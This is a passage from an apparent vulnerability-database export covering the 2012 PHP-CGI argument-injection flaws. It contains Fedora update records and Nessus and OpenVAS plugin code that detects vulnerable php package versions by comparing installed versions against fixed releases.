script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5>5.4<5.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php5<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php53<5.3.13\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"php52<5.2.17_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. 
", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:089FC20F0D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.13-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Encoder. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:B599720F97", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-eaccelerator-0.9.6.1-9.fc15.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Encoder. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:2174220F39", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-eaccelerator-0.9.6.1-9.fc16.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nervous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. 
", "modified": "2012-05-27T01:52:21", "published": "2012-05-27T01:52:21", "id": "FEDORA:11BE720F24", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: maniadrive-1.2-32.fc16.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:A24AB20F77", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-5.3.13-1.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. 
", "modified": "2012-05-27T07:21:55", "published": "2012-05-27T07:21:55", "id": "FEDORA:ACED120F82", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: maniadrive-1.2-32.fc15.5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:9729C2155E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: php-5.4.3-1.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2311", "CVE-2012-2329"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. 
", "modified": "2012-05-26T07:21:09", "published": "2012-05-26T07:21:09", "id": "FEDORA:A07AD21BF1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: maniadrive-1.2-40.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2012-07-02T22:31:44", "published": "2012-07-02T22:31:44", "id": "FEDORA:42AD9212FB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.14-1.fc16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823", "CVE-2012-2143", "CVE-2012-2311", "CVE-2012-2386", "CVE-2012-2688"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. 
", "modified": "2012-08-05T21:22:14", "published": "2012-08-05T21:22:14", "id": "FEDORA:8819720FCC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: php-5.3.15-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2018-01-06T13:06:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "Check for the Version of php", "modified": "2018-01-04T00:00:00", "published": "2012-05-28T00:00:00", "id": "OPENVAS:864257", "href": "http://plugins.openvas.org/nasl.php?oid=864257", "type": "openvas", "title": "Fedora Update for php FEDORA-2012-7567", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2012-7567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated web pages. 
PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts.\n\n The php package contains the module which adds support for the PHP\n language to Apache HTTP Server.\";\n\ntag_affected = \"php on Fedora 15\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/081333.html\");\n script_id(864257);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-28 10:26:57 +0530 (Mon, 28 May 2012)\");\n script_cve_id(\"CVE-2012-2311\", \"CVE-2012-1823\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-7567\");\n script_name(\"Fedora Update for php FEDORA-2012-7567\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == 
\"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.3.13~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-01-31T18:41:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-12-13T00:00:00", "id": "OPENVAS:1361412562310850218", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850218", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2012:0590-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850218\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:02:10 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2311\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0590-1\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2012:0590-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE12\\.1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 12.1, openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"when used in CGI mode remote attackers could inject command\n line arguments to php\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"apache2-mod_php5-debuginfo\", rpm:\"apache2-mod_php5-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bcmath-debuginfo\", rpm:\"php5-bcmath-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-bz2-debuginfo\", rpm:\"php5-bz2-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-calendar-debuginfo\", rpm:\"php5-calendar-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ctype-debuginfo\", rpm:\"php5-ctype-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-curl-debuginfo\", rpm:\"php5-curl-debuginfo~5.3.5~332.1\", 
rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dba-debuginfo\", rpm:\"php5-dba-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debuginfo\", rpm:\"php5-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-debugsource\", rpm:\"php5-debugsource~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-dom-debuginfo\", rpm:\"php5-dom-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant\", rpm:\"php5-enchant~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-enchant-debuginfo\", rpm:\"php5-enchant-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-exif-debuginfo\", rpm:\"php5-exif-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fastcgi-debuginfo\", rpm:\"php5-fastcgi-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo\", rpm:\"php5-fileinfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"php5-fileinfo-debuginfo\", rpm:\"php5-fileinfo-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm\", rpm:\"php5-fpm~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-fpm-debuginfo\", rpm:\"php5-fpm-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ftp-debuginfo\", rpm:\"php5-ftp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gd-debuginfo\", rpm:\"php5-gd-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gettext-debuginfo\", rpm:\"php5-gettext-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-gmp-debuginfo\", rpm:\"php5-gmp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-hash-debuginfo\", rpm:\"php5-hash-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-iconv-debuginfo\", 
rpm:\"php5-iconv-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-imap-debuginfo\", rpm:\"php5-imap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl\", rpm:\"php5-intl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-intl-debuginfo\", rpm:\"php5-intl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-json-debuginfo\", rpm:\"php5-json-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-ldap-debuginfo\", rpm:\"php5-ldap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mbstring-debuginfo\", rpm:\"php5-mbstring-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mcrypt-debuginfo\", rpm:\"php5-mcrypt-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-mysql-debuginfo\", 
rpm:\"php5-mysql-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-odbc-debuginfo\", rpm:\"php5-odbc-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-openssl-debuginfo\", rpm:\"php5-openssl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pcntl-debuginfo\", rpm:\"php5-pcntl-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pdo-debuginfo\", rpm:\"php5-pdo-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pgsql-debuginfo\", rpm:\"php5-pgsql-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar\", rpm:\"php5-phar~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-phar-debuginfo\", rpm:\"php5-phar-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-posix-debuginfo\", rpm:\"php5-posix-debuginfo~5.3.5~332.1\", 
rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-pspell-debuginfo\", rpm:\"php5-pspell-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-readline-debuginfo\", rpm:\"php5-readline-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-shmop-debuginfo\", rpm:\"php5-shmop-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-snmp-debuginfo\", rpm:\"php5-snmp-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-soap-debuginfo\", rpm:\"php5-soap-debuginfo~5.3.5~332.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php5-sockets\", 